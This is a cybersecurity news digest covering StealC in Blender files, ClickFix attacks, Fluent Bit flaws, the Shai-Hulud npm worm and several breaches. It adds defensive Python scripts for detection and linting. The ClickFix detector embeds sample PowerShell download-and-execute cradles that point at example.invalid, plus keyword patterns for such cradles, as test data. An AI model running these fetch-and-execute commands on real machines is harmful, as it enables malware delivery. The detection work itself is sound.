Daily Brief

Articles are listed below with generated summaries

Total articles found: 12633

Checks for new stories every ~15 minutes

2025-11-24 22:02:08 bleepingcomputer MALWARE Russian-Linked Campaign Utilizes Blender Files for StealC Malware Delivery
A Russian-associated operation is distributing StealC V2 through malicious Blender files uploaded to 3D model marketplaces such as CGTrader, targeting users of the open-source 3D creation suite. The attack relies on Blender's Auto Run feature: a Python script embedded in the .blend file runs when the file is opened and fetches a loader from a Cloudflare Workers domain. The loader retrieves a PowerShell script, which downloads two ZIP archives containing the StealC infostealer and an auxiliary Python stealer that serves as a fallback if the first fails. Morphisec researchers note that this StealC variant had no detections on VirusTotal at the time of analysis and expands the malware's data-stealing capabilities. Users are advised to disable Blender's automatic script execution, to treat 3D assets as executable files, and to open untrusted assets only in a sandboxed environment. The campaign underscores the need for cautious file handling and for closer scrutiny of user-submitted content on digital marketplaces.
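The attack above works because a .blend file can carry Python text datablocks that Blender runs on load when Auto Run is enabled. The following triage script, added here as an illustration and not code from the article or from Morphisec, parses the long-standing .blend file-block layout (header, then blocks with a code, size, old pointer, SDNA index and count), counts embedded Text datablocks (code "TX") and greps the DATA blocks that follow each one for signs of a script that reaches outside Blender. The keyword list, the assumption that DATA blocks directly after a TX block hold its text lines, and the constructed sample file are all mine; newer large-file header variants are out of scope.

```python
import gzip
import re
import struct

# Heuristic indicators of a script that reaches outside Blender. This list is an
# assumption for triage, not a signature taken from the report.
SUSPICIOUS = re.compile(
    rb"(import\s+(?:os|subprocess|urllib|socket|ctypes|base64)|subprocess\.|"
    rb"os\.system|os\.popen|exec\(|eval\(|powershell|cmd\.exe|workers\.dev|https?://)",
    re.IGNORECASE,
)


def _decompress(data: bytes) -> bytes:
    """Blender may save gzip- or zstd-compressed files. gzip is handled here; a
    zstd file (magic 28 b5 2f fd) must be decompressed first (zstandard module)."""
    if data[:2] == b"\x1f\x8b":
        return gzip.decompress(data)
    if data[:4] == b"\x28\xb5\x2f\xfd":
        raise ValueError("zstd-compressed .blend; decompress before scanning")
    return data


def iter_blocks(data: bytes):
    """Yield (code, payload) for every file-block of a classic .blend.

    File header: b'BLENDER' + pointer size ('_' = 4, '-' = 8 bytes) + endianness
    ('v' little, 'V' big) + 3-char version. Block header: 4-byte code, uint32 size,
    old pointer, uint32 SDNA index, uint32 count, then `size` payload bytes."""
    if data[:7] != b"BLENDER":
        raise ValueError("not a classic .blend header")
    ptr_size = 4 if data[7:8] == b"_" else 8
    endian = "<" if data[8:9] == b"v" else ">"
    hdr_len = 4 + 4 + ptr_size + 4 + 4
    pos = 12
    while pos + hdr_len <= len(data):
        code = data[pos:pos + 4]
        (size,) = struct.unpack(endian + "I", data[pos + 4:pos + 8])
        pos += hdr_len
        yield code, data[pos:pos + size]
        if code == b"ENDB":
            break
        pos += size


def scan_blend(data: bytes) -> dict:
    """Count embedded Text datablocks ('TX') and grep the DATA blocks following
    each one (where the text lines live) for suspicious content. Treating every
    DATA block after a TX block as script text is a heuristic, not a full parse."""
    data = _decompress(data)
    text_blocks, hits, in_text = 0, set(), False
    for code, payload in iter_blocks(data):
        if code == b"TX\x00\x00":
            text_blocks += 1
            in_text = True
        elif code == b"DATA" and in_text:
            for m in SUSPICIOUS.finditer(payload):
                hits.add(m.group(0).decode("latin-1").lower())
        else:
            in_text = False
    verdict = "embedded script: open only with autoexec disabled" if text_blocks else "no embedded scripts"
    return {"text_blocks": text_blocks, "suspicious": sorted(hits), "verdict": verdict}


def build_sample_blend(script=None, compress=False) -> bytes:
    """Constructed minimal file for testing (not a real Blender export): header,
    optionally one TX block plus a DATA block carrying `script`, then ENDB."""
    def block(code: bytes, payload: bytes) -> bytes:
        # 8-byte old pointer, SDNA index 0, count 1 (values are irrelevant here)
        return code + struct.pack("<I", len(payload)) + b"\0" * 8 + struct.pack("<II", 0, 1) + payload

    body = b""
    if script is not None:
        body = block(b"TX\x00\x00", b"\0" * 16) + block(b"DATA", script)
    raw = b"BLENDER-v402" + body + block(b"ENDB", b"")
    return gzip.compress(raw) if compress else raw


if __name__ == "__main__":
    import sys
    for path in sys.argv[1:]:
        with open(path, "rb") as fh:
            print(path, scan_blend(fh.read()))
```

Run it over downloaded assets before opening them; a file that reports any text block deserves a look inside Blender's Text Editor with scripts disabled. Blender also accepts `--disable-autoexec` on the command line, which is the equivalent of turning off the Auto Run preference for that session.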
2025-11-24 20:46:53 bleepingcomputer MALWARE ClickFix Attack Exploits Fake Windows Update to Deploy Malware
Cybercriminals are running ClickFix attacks that use a fake Windows Update screen to talk users into pasting and running a malicious command themselves, via the Run dialog or Command Prompt, so the initial execution comes from the user's own keyboard rather than from an exploit and works against technical and non-technical users alike. Recent variants drop the LummaC2 and Rhadamanthys information stealers and hide the payload inside PNG images using steganography. The infection proceeds in stages: PowerShell and .NET assemblies reconstruct the malware from the encrypted image data before it runs. Researchers also identified an evasion technique they call ctrampoline, which complicates the malware's execution path to hinder detection. The law-enforcement action Operation Endgame disrupted part of the infrastructure, and payload delivery on the compromised domains had stopped as of November 13. Security experts recommend disabling the Windows Run box where it is not needed and monitoring for suspicious child processes to mitigate ClickFix attacks.
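The detection opportunity in a ClickFix chain is the process lineage: the user pastes into Win+R, so the interpreter is spawned by explorer.exe, usually with a hidden window, a download cradle, an encoded command, or a reference to an image file carrying the payload. The script below, added here as an illustration and not code from the article or from the researchers it cites, scores process-creation events of that shape. The event fields mimic Sysmon Event ID 1 naming, but the events themselves are constructed (example.invalid hosts, invented paths), and the indicator list is my own.

```python
import base64
import re

INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe", "cscript.exe"}
CRADLE = re.compile(
    r"\b(?:iwr|irm|iex|invoke-webrequest|invoke-restmethod|invoke-expression|"
    r"downloadstring|downloadfile|net\.webclient|frombase64string)\b", re.I)
HIDDEN = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)
ENCODED = re.compile(r"(?:^|\s)-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]{16,})", re.I)
IMAGE = re.compile(r"\.png\b", re.I)


def decode_encoded_command(cmdline: str) -> str:
    """PowerShell -EncodedCommand carries base64 of UTF-16LE text; return it or ''."""
    m = ENCODED.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le", errors="replace")
    except ValueError:  # binascii.Error is a ValueError
        return ""


def _basename(path: str) -> str:
    # Windows paths on any host OS: split on both separators
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def indicators_for(event: dict) -> list:
    """Return the ClickFix-style indicators present in one process-creation event."""
    found = []
    parent, image = _basename(event.get("ParentImage", "")), _basename(event.get("Image", ""))
    cmd = event.get("CommandLine", "")
    decoded = decode_encoded_command(cmd)
    text = cmd + "\n" + decoded          # inspect the decoded script as well
    if parent == "explorer.exe" and image in INTERPRETERS:
        found.append("run_dialog_parent")  # Win+R children run under explorer.exe
    if decoded:
        found.append("encoded_command")
    if HIDDEN.search(text):
        found.append("hidden_window")
    if CRADLE.search(text):
        found.append("download_cradle")
    if IMAGE.search(text):
        found.append("image_payload")      # script fetching or reading a PNG
    return found


def analyze(events: list) -> list:
    """Flag events whose interpreter was spawned from explorer.exe and that show at
    least one further indicator; a bare 'cmd /c echo' from Win+R is not flagged."""
    results = []
    for i, ev in enumerate(events):
        ind = indicators_for(ev)
        if "run_dialog_parent" in ind and len(ind) > 1:
            results.append({"index": i, "image": _basename(ev.get("Image", "")), "indicators": ind,
                            "decoded": decode_encoded_command(ev.get("CommandLine", ""))})
    return results


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
# Encoded form of a constructed cradle, built here so the sample is self-consistent
_ENC = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/u.png')".encode("utf-16-le")
).decode()

# Constructed events in a Sysmon Event ID 1-like shape; not real telemetry.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": r'powershell -w hidden -ep bypass -c "iwr https://example.invalid/update.png -OutFile $env:TEMP\u.png; iex (Get-Content $env:TEMP\u.png -Raw)"'},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": 'cmd /c "echo hello"'},
    {"ParentImage": r"C:\Users\dev\AppData\Local\Programs\Microsoft VS Code\Code.exe", "Image": PS,
     "CommandLine": "powershell -ExecutionPolicy Bypass -File build.ps1"},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": f"powershell -nop -w hidden -enc {_ENC}"},
]

if __name__ == "__main__":
    for hit in analyze(SAMPLE_EVENTS):
        print(hit)
```

The same logic ports directly to an EDR or SIEM rule (parent explorer.exe, child in the interpreter set, plus one cradle or hiding indicator). For after-the-fact triage, the command the victim pasted is also recorded per user under the RunMRU key (HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU), which is a forensic artifact not mentioned in the article but worth collecting.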
2025-11-24 20:05:42 theregister MISCELLANEOUS Cybersecurity Leaders Launch Initiative to Dispel Myths and Promote Best Practices
A coalition of 86 cybersecurity leaders, including former CISA officials, has launched Hacklore.org to retire outdated security myths and promote practices that work. The initiative aims to replace "hacklore" with actionable advice: keep software patched and up to date, use strong passwords, and turn on multi-factor authentication. Long-repeated advice such as avoiding public Wi-Fi and changing passwords on a schedule is described as misleading and often counterproductive. The site encourages organizations to adopt phishing-resistant MFA and to build systems that tolerate human error, so that a single employee mistake has limited impact. It also calls on software manufacturers to ship secure-by-design products and to be transparent in vulnerability disclosures. The signatories urge a shift from catchy but inaccurate advice to guidance that genuinely reduces risk, aligning everyday practice with the actual threat landscape, particularly ahead of high-risk periods like Cyber Monday and holiday travel.
2025-11-24 17:42:05 bleepingcomputer DATA BREACH SitusAMC Data Breach Exposes Sensitive Client and Customer Information
SitusAMC, a major provider of real-estate finance services, reported a data breach affecting client and customer information that it discovered in early November 2025. The breach exposed accounting records and legal agreements belonging to clients, among them large banks such as Citi, Morgan Stanley, and JPMorgan Chase. SitusAMC said no encrypting malware was involved and that business operations continue without disruption for its extensive client base. The company has engaged external cybersecurity experts to investigate and is communicating directly with affected clients to establish the scope of the breach. Client notifications began on November 16, with updates promised as the investigation progresses. The full extent of the breach remains uncertain because of the complexity of the data involved, and work to identify all affected parties is ongoing. The financial institutions potentially affected have not yet commented, leaving open what the breach means for their own customers.
2025-11-24 15:25:51 theregister VULNERABILITIES Critical Vulnerabilities in Fluent Bit Threaten Major Cloud Services
Oligo Security identified five vulnerabilities in Fluent Bit, the open-source log collection agent used by major cloud providers including Google, Amazon, and Microsoft. The flaws, some of which have been present for years, allow attackers to bypass authentication, perform path traversal, and in some cases achieve remote code execution, a serious risk in the cloud environments where the agent runs. They include CVE-2025-12972, a path traversal vulnerability, and CVE-2025-12970, a stack buffer overflow, both of which can lead to remote code execution. Fluent Bit's reach, with more than 15 billion downloads and a central role in telemetry collection for cloud and AI environments, amplifies the potential impact. Affected organizations are urged to update to Fluent Bit 4.1.1 or 4.0.12. The disclosure process involved collaboration with AWS and highlighted the need for better security reporting and CVE assignment for open-source projects. The incident underscores the importance of securing open-source infrastructure and of cooperation among maintainers, cloud providers, and security researchers.
2025-11-24 15:05:21 thehackernews VULNERABILITIES Critical Vulnerabilities in Fluent Bit Threaten Cloud Infrastructure Security
Researchers identified five vulnerabilities in Fluent Bit, a widely deployed telemetry agent, that enable remote code execution and intrusion into cloud infrastructure. The flaws allow authentication bypass, path traversal, denial of service, and data manipulation, affecting cloud and Kubernetes deployments. An attacker could use them to execute code, alter event logs, and inject misleading telemetry, which complicates incident response by corrupting the very data responders rely on. The issues are fixed in Fluent Bit 4.1.1 and 4.0.12, and AWS has urged customers to update. Recommended hardening includes restricting dynamic tag use, locking down output paths, and running the agent with read-only configurations. Because Fluent Bit is so widely used in enterprises, unpatched instances risk service disruption and loss of data integrity. The disclosure follows earlier Fluent Bit vulnerabilities and underlines the need for continuous monitoring and timely patching.
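Both Fluent Bit items above reduce to two questions for an operator: is the running version at or past 4.1.1 / 4.0.12, and does the configuration expose the risky surfaces the researchers name (dynamic tags, unconstrained output paths, unauthenticated inputs)? The script below is an added example, not code from either article, from Oligo, or from the Fluent Bit project. It parses the classic Fluent Bit configuration format and applies a small local policy built from the mitigation advice; which configuration option each CVE actually hinges on is not stated in the articles, so the checks are my own assumptions, as are the option names `Shared_Key` (in_forward), `tag_key` (in_http) and `File` (out_file) and the constructed weak and hardened configs.

```python
FIXED_41 = (4, 1, 1)      # first fixed release on the 4.1 line
FIXED_40_PATCH = 12       # 4.0.12 is the backported fix on the 4.0 line


def parse_version(version: str) -> tuple:
    parts = [int(p) for p in version.strip().lstrip("v").split(".")[:3]]
    while len(parts) < 3:
        parts.append(0)
    return tuple(parts)


def is_patched(version: str) -> bool:
    """True if the version carries the fixes: 4.0.12+ on the 4.0 line, 4.1.1+ otherwise."""
    major, minor, patch = parse_version(version)
    if (major, minor) == (4, 0):
        return patch >= FIXED_40_PATCH
    return (major, minor, patch) >= FIXED_41


def parse_classic_config(text: str) -> list:
    """Minimal parser for Fluent Bit's classic config: [SECTION] headers followed
    by 'Key Value' lines. Keys are case-insensitive; '#' starts a comment."""
    sections = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("[") and line.endswith("]"):
            sections.append({"_section": line[1:-1].upper()})
        elif sections:
            key, _, value = line.partition(" ")
            sections[-1][key.lower()] = value.strip()
    return sections


def lint(sections: list, version: str) -> list:
    """Return (check_id, message) pairs. The checks encode the mitigation advice
    as local policy; they are not a statement of what each CVE requires."""
    findings = []
    if not is_patched(version):
        findings.append(("unpatched_version", f"Fluent Bit {version} predates the fixes; move to 4.1.1 or 4.0.12"))
    for s in sections:
        kind, plugin = s["_section"], s.get("name", "").lower()
        if kind == "INPUT":
            if plugin == "forward" and "shared_key" not in s:
                findings.append(("forward_no_shared_key", "in_forward accepts records without a shared key"))
            if plugin == "http" and "tag_key" in s:
                findings.append(("http_tag_key", "in_http lets the client choose the record tag via tag_key"))
            if plugin in {"forward", "http", "tcp"} and s.get("listen", "0.0.0.0") == "0.0.0.0":
                findings.append(("exposed_listener", f"in_{plugin} listens on all interfaces"))
        elif kind == "OUTPUT" and plugin == "file" and "file" not in s:
            findings.append(("file_output_tag_name", "out_file derives the file name from the record tag; set File explicitly"))
    return findings


WEAK_CONFIG = """\
[SERVICE]
    flush 1
[INPUT]
    Name forward
    Port 24224
[INPUT]
    Name http
    Port 9880
    tag_key tag
[OUTPUT]
    Name file
    Match *
    Path /var/log/fluent-bit
"""

HARDENED_CONFIG = """\
[SERVICE]
    flush 1
[INPUT]
    Name forward
    Listen 127.0.0.1
    Port 24224
    Shared_Key replace-with-a-long-random-secret
[INPUT]
    Name http
    Listen 127.0.0.1
    Port 9880
[OUTPUT]
    Name file
    Match app.*
    Path /var/log/fluent-bit
    File app.log
"""


def demo() -> tuple:
    """Lint the constructed weak config on an old version and the hardened one on 4.1.1."""
    return (lint(parse_classic_config(WEAK_CONFIG), "4.0.11"),
            lint(parse_classic_config(HARDENED_CONFIG), "4.1.1"))


if __name__ == "__main__":
    for label, findings in zip(("weak", "hardened"), demo()):
        print(label, findings or "clean")
```

Point it at `fluent-bit -V` output and the deployed config; a clean result means only that the obvious surfaces are closed, so keep the version check as the primary control.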
2025-11-24 15:05:21 bleepingcomputer VULNERABILITIES Transitioning to Cloud-Native Patching for Enhanced Security Compliance
Traditional tools such as SCCM and WSUS struggle to keep patch compliance up in hybrid work environments, which leaves devices vulnerable for longer. SCCM's reliance on the deprecated WSUS technology brings maintenance burdens and synchronization failures that delay patch deployment. Cloud-native patch management delivers updates over the internet with no dependency on the corporate network or VPN, which makes patching more consistent for remote devices. Organizations that adopt modern patching report a lower likelihood of breaches, lower cyber-insurance costs, and better compliance metrics. Legacy systems also carry hidden costs in servers, databases, and VPN troubleshooting, while cloud-native solutions reduce that overhead. By automating patch management and giving real-time visibility, cloud-native tools align IT and security priorities around predictable outcomes. As hybrid work becomes the norm, moving to cloud-native patching is presented as a strategic risk-management decision.
2025-11-24 14:50:31 theregister DATA BREACH SitusAMC Data Breach Raises Concerns for Major Financial Institutions
SitusAMC, a real-estate finance firm, suffered a data breach in which confidential client data, including accounting records and legal agreements, was stolen. The intrusion, confirmed on November 15, did not involve ransomware, but the full extent of the compromised data is still under investigation. Major banks such as Citi, JPMorgan Chase, and Morgan Stanley were potentially affected, though the company has not named specific clients. SitusAMC is working with federal law enforcement and outside cybersecurity experts to investigate and to harden its systems. Immediate containment steps included resetting staff credentials, disabling remote access tools, updating firewall rules, and tightening security settings. The FBI is involved in the investigation and has said that SitusAMC's services continue to operate without disruption. With a global client base of more than 1,500 organizations, the breach could have a wide impact across the financial sector. The company is still determining which products and services were affected and has promised updates as more information becomes available.
2025-11-24 14:40:49 bleepingcomputer MALWARE Shai-Hulud Malware Infects Thousands of npm Packages, Leaks Secrets
A new wave of the Shai-Hulud supply-chain attack has compromised more than 500 npm packages, with the count still climbing, and targets developer and CI/CD secrets, which it publishes in encoded form to GitHub. The campaign, first detected in mid-September, has spread rapidly and now involves around 350 compromised maintainer accounts. The attackers inject malicious lifecycle scripts into package.json and use the hijacked maintainer accounts to publish the trojanized versions to npm. Security researchers found that the malware uses TruffleHog to hunt for secrets and relies on heavy obfuscation to evade detection. GitHub is removing the repositories the malware creates, but new ones appear faster than they are taken down, which complicates containment. Affected developers are advised to pin or downgrade to known-good package versions, rotate any exposed secrets, and disable npm's install-time lifecycle scripts (such as preinstall and postinstall) to reduce exposure. The attack coincides with GitHub's gradual rollout of stronger security measures against supply-chain threats on npm.
2025-11-24 14:10:38 theregister MALWARE Shai-Hulud Worm Targets npm, Compromising Thousands of Repositories
A new variant of the Shai-Hulud worm has compromised more than 25,000 GitHub repositories within a few days by spreading through trojanized npm packages, affecting developers worldwide. Affected packages include ones published by Zapier, AsyncAPI, ENS Domains, PostHog, and Postman, all of which see high weekly download volumes. The malware scans infected systems for AWS, GCP, Azure, and GitHub credentials and publishes them to repositories created under the victims' own GitHub accounts. GitHub is removing the repositories, but the speed of the worm's spread makes containment difficult. Unlike earlier versions, the worm runs during npm's preinstall phase, which exposes build and runtime environments before the package is even fully installed. Security teams are advised to clear npm caches, roll back dependencies, rotate credentials, and monitor for indicators of compromise. GitHub and npm are tightening security, including moving to FIDO-based authentication and revoking classic tokens, to blunt future supply-chain attacks.
2025-11-24 14:10:37 bleepingcomputer DATA BREACH Harvard University Data Breach Exposes Alumni and Donor Information
Harvard University reported a data breach of its Alumni Affairs and Development systems that compromised personal data of students, alumni, donors, staff, and faculty. The breach, which began with a voice phishing (vishing) attack, exposed email addresses, phone numbers, home addresses, and event attendance records but no sensitive financial data. University officials, including the Vice President for Alumni Affairs and Development, confirmed that Social Security numbers and payment information were not affected. Harvard is working with law enforcement and cybersecurity experts to investigate, and has notified affected individuals to stay alert for phishing attempts that build on the stolen contact details. The university says it has secured its systems against further unauthorized access and warns recipients to be wary of unexpected requests for sensitive information. The incident follows a recent claim by the Clop ransomware group to have breached Harvard systems through a zero-day vulnerability, highlighting the university's ongoing exposure. It is also part of a broader pattern, with Princeton and the University of Pennsylvania disclosing similar breaches recently.
2025-11-24 13:23:41 theregister NATION STATE ACTIVITY FCC Reverses Telecom Security Rules Amid Espionage Concerns
The FCC has repealed the telecom cybersecurity rules it adopted after the China-linked Salt Typhoon espionage campaign, calling them "unlawful and ineffective." The decision passed on a 2-1 vote, with the dissenting commissioner warning that it weakens national security against state-sponsored threats. The original rules were meant to secure telecom networks, particularly the lawful-intercept systems that state-backed intruders had breached. The FCC argues that carriers have since improved their security voluntarily, making formal rules unnecessary. Critics counter that without enforceable standards the U.S. remains exposed to future breaches and has no framework for verifying compliance. The FCC says it will take a more flexible approach, relying on industry cooperation and targeted rules for specific areas such as submarine cable security. Concerns remain about whether smaller carriers can sustain robust security without mandatory requirements, leaving gaps an adversary could exploit.
2025-11-24 13:13:22 thehackernews CYBERCRIME Sha1-Hulud Campaign Targets 25,000+ Repositories with Credential Theft
A second wave of the Sha1-Hulud campaign has compromised more than 25,000 GitHub repositories by running malicious code during npm's preinstall phase to steal credentials. The new variant targets build and runtime environments and publishes stolen secrets to GitHub repositories carrying the description "Sha1-Hulud: The Second Coming." Attackers use compromised maintainer accounts to publish trojanized npm packages, so credential theft and exfiltration happen as soon as a victim installs a dependency. The payload also registers infected machines as GitHub Actions self-hosted runners, giving the attackers arbitrary command execution and another exfiltration channel. More than 350 unique users have been affected, and new repositories were appearing at a rate of about 1,000 every 30 minutes. Security firms recommend scanning endpoints immediately, removing the compromised packages, rotating credentials, and auditing GitHub workflows and runners for unexpected activity. The campaign has also turned destructive: a wiper-like routine destroys data on the host if credential theft or exfiltration fails, a shift from pure theft to punitive sabotage.
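The three Shai-Hulud items above (BleepingComputer, The Register, and this one) all turn on the same mechanism, npm running a package's install-time lifecycle script with the developer's or CI runner's credentials in reach, and on the same two responses: find which installed packages carry such hooks, and find the dump repositories the worm creates under your accounts. The script below is an added example, not code from any of the articles, from GitHub, or from the campaign's analysts. It walks a project for package.json files with preinstall/install/postinstall/prepare hooks, checks whether `.npmrc` sets `ignore-scripts=true`, and filters repository objects shaped like GitHub's API response by the description quoted above. The sample project tree and repository list are constructed; the hook command and package names in it are invented and are not indicators from the campaign.

```python
import json
import tempfile
from pathlib import Path

# npm runs these automatically during `npm install` (prepare runs for git deps and
# local installs); other scripts such as prepublishOnly do not run on a consumer's machine.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")
EXFIL_DESCRIPTION = "Sha1-Hulud: The Second Coming"


def find_install_scripts(root) -> list:
    """Report every package under `root` whose package.json declares an install-time hook."""
    findings = []
    for manifest in sorted(Path(root).rglob("package.json")):
        try:
            data = json.loads(manifest.read_text(encoding="utf-8"))
        except (ValueError, OSError):
            continue                      # unreadable or malformed manifest: skip, not fatal
        scripts = data.get("scripts") or {}
        hooks = {h: scripts[h] for h in INSTALL_HOOKS if h in scripts}
        if hooks:
            findings.append({"package": data.get("name", manifest.parent.name),
                             "version": data.get("version", "?"),
                             "path": str(manifest), "hooks": hooks})
    return findings


def ignore_scripts_enabled(project_dir) -> bool:
    """True if the project's .npmrc disables lifecycle scripts (ignore-scripts=true)."""
    npmrc = Path(project_dir) / ".npmrc"
    if not npmrc.is_file():
        return False
    for line in npmrc.read_text(encoding="utf-8").splitlines():
        key, _, value = line.strip().partition("=")
        if key.strip() == "ignore-scripts" and value.strip().lower() == "true":
            return True
    return False


def flag_exfil_repos(repos: list) -> list:
    """Names of repositories (GitHub API-shaped dicts) carrying the campaign's description."""
    return [r["name"] for r in repos if EXFIL_DESCRIPTION in (r.get("description") or "")]


def build_sample_project() -> str:
    """Constructed tree: two packages without install hooks and one with a preinstall hook."""
    root = tempfile.mkdtemp(prefix="npm-scan-")
    packages = {
        "left-pad-ish": {"name": "left-pad-ish", "version": "1.0.0", "scripts": {"test": "node test.js"}},
        "build-tool": {"name": "build-tool", "version": "2.3.1", "scripts": {"prepublishOnly": "tsc"}},
        "trojanized-lib": {"name": "trojanized-lib", "version": "9.9.9",
                           "scripts": {"preinstall": "node install-helper.js"}},
    }
    for folder, manifest in packages.items():
        pkg_dir = Path(root, "node_modules", folder)
        pkg_dir.mkdir(parents=True)
        (pkg_dir / "package.json").write_text(json.dumps(manifest), encoding="utf-8")
    (Path(root) / ".npmrc").write_text("ignore-scripts=true\n", encoding="utf-8")
    return root


# Constructed stand-in for a `GET /user/repos` response; only the fields used here.
SAMPLE_REPOS = [
    {"name": "my-service", "description": "Internal API service"},
    {"name": "x7k2m9q", "description": "Sha1-Hulud: The Second Coming"},
    {"name": "dotfiles", "description": None},
]


if __name__ == "__main__":
    root = build_sample_project()
    print("install hooks:", find_install_scripts(root))
    print("ignore-scripts:", ignore_scripts_enabled(root))
    print("suspect repos:", flag_exfil_repos(SAMPLE_REPOS))
```

Run `find_install_scripts` against a real checkout after `npm ci` to get the list of packages that execute code at install time, then review each hook rather than assuming every hook is malicious (native addons legitimately use `install`). Feed `flag_exfil_repos` the output of the GitHub API's repository listing for every user and organization you control; hits there mean the credentials on the machine that produced them are already exposed and must be rotated.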
2025-11-24 12:35:49 thehackernews VULNERABILITIES Fortinet Faces Criticism Over Handling of FortiWeb Vulnerabilities
Fortinet disclosed a medium-severity FortiWeb vulnerability, CVE-2025-58034 (CVSS 6.7), that is already being exploited in the wild. The flaw lets an authenticated attacker execute unauthorized code on the underlying system via crafted HTTP requests or CLI commands. Fortinet fixed it in FortiWeb 8.0.2 but drew criticism for how late and how quietly it disclosed the issue. A second, critical vulnerability, CVE-2025-64446 (CVSS 9.1), an authentication bypass, had earlier been patched silently, raising concerns about transparency with customers. Orange Cyberdefense reported exploitation campaigns chaining the two flaws, using the authentication bypass to reach the command injection. The staggered disclosures raise the question of whether Fortinet is deliberately delaying publication so patches can be deployed before threat actors are alerted, at the cost of leaving customers uninformed. Organizations running FortiWeb are urged to apply the latest patches promptly.
2025-11-24 12:28:27 theregister VULNERABILITIES CISA Mandates Urgent Patch for Oracle Identity Manager Flaw
CISA has directed U.S. federal agencies to patch a critical Oracle Identity Manager vulnerability, CVE-2025-61757, by December 12 following signs of active exploitation. The flaw allows an unauthenticated attacker with network access to fully compromise Oracle Identity Manager. Searchlight Cyber researchers, who detailed the vulnerability, describe it as "trivial" to exploit: a single HTTP request bypasses authentication. Log evidence suggests it was exploited as a zero-day, with activity recorded between August 30 and September 9, before Oracle released a patch. Oracle's October advisory rated the issue critical but did not acknowledge in-the-wild exploitation, raising concerns about the transparency of its vulnerability disclosures. The urgency is compounded by Oracle's earlier security troubles this year, including a major breach attributed to the Clop ransomware group. Federal agencies that miss the deadline face compliance consequences, underscoring the need for timely updates and sound security practices.